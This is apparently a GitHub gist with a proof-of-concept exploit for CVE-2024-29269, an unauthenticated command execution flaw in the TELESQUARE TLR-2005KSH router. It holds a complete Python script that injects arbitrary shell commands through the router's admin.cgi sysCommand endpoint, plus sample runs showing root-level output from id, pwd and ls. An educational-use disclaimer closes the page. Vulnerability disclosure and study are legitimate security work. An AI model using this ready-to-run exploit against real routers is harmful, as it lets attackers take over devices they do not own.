win3zz/CVE-2024-29269.md

## CVE-2024-29269.md

      
    Raw
  

              CVE-2024-29269.md
            
          
    TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution


CVE: CVE-2024-29269
Severity: Critical
Details/Reference: https://github.com/wutalent/CVE-2024-29269/blob/main/index.md (archive)

PoC

File: script.py
import sys
import requests
import xml.etree.ElementTree as ET


def get_systemutil_response(url, command, proxy):
    endpoint = f"/cgi-bin/admin.cgi?Command=sysCommand&Cmd={command}"
    full_url = url.rstrip('/') + endpoint
    headers = {
        'Referer': url,
    }
    try:
        response = requests.get(full_url, headers=headers, proxies=proxy)
        if response.status_code == 200:
            print("Response from", full_url)
            #print(response.text)
            root = ET.fromstring(response.text)
            for cmd_result in root.findall('CmdResult'):
                data = cmd_result.text.strip()
                print(data)
        else:
            print("Error: Failed to fetch data. Status code:", response.status_code)
    except requests.exceptions.RequestException as e:
        print("Error:", e)

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python script.py <url> <command>")
        sys.exit(1)
    url = sys.argv[1]
    command = sys.argv[2]
    proxy = {
        'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080',
    }
    get_systemutil_response(url, command, proxy)
To run the script, use the following commands:
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py
Usage: python script.py <url> <command>
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ id
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
uid=0(admin) gid=0(admin)
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ pwd
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=pwd
/etc_ro/lighttpd/www/cgi-bin
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ "ls -al"
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls -al
-rwxrwxr-x    1 1000     1000       xxxxxx web
-rwxrwxr-x    1 1000     1000        xxxxx update.cgi
-rwxrwxr-x    1 1000     1000        xxxxx lte.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportTrafficLog.sh
-rwxrwxr-x    1 1000     1000        xxxxx nms.cgi
-rwxrwxr-x    1 1000     1000        xxxxx admin.cgi
-rwxrwxr-x    1 1000     1000        xxxxx bip.cgi
-rwxrwxr-x    1 1000     1000        xxxxx systemutil.cgi
-rwxrwxr-x    1 1000     1000        xxxxx wireless.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportvpnLog.sh
-rwxrwxr-x    1 1000     1000        xxxxx serialmodem.cgi
-rwxrwxr-x    1 1000     1000        xxxxx modem.cgi
-rwxrwxr-x    1 1000     1000        xxxxx traffic.cgi
-rwxrwxr-x    1 1000     1000        xxxxx firewall.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportSettings.sh
-rwxrwxr-x    1 1000     1000        xxxxx serial.cgi
-rwxrwxr-x    1 1000     1000        xxxxx gmmp.cgi
-rwxrwxr-x    1 1000     1000        xxxxx internet.cgi
-rw-r--r--    1 0        0               0 xx.txt`
-rw-r--r--    1 0        0              xx xxyyzz.txt
-rwxrwxrwx    1 0        0         xxxxxxx linux-mips
drwxrwxr-x   21 1000     1000            0 ..
drwxrwxr-x    2 1000     1000            0 .


Disclaimer

This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.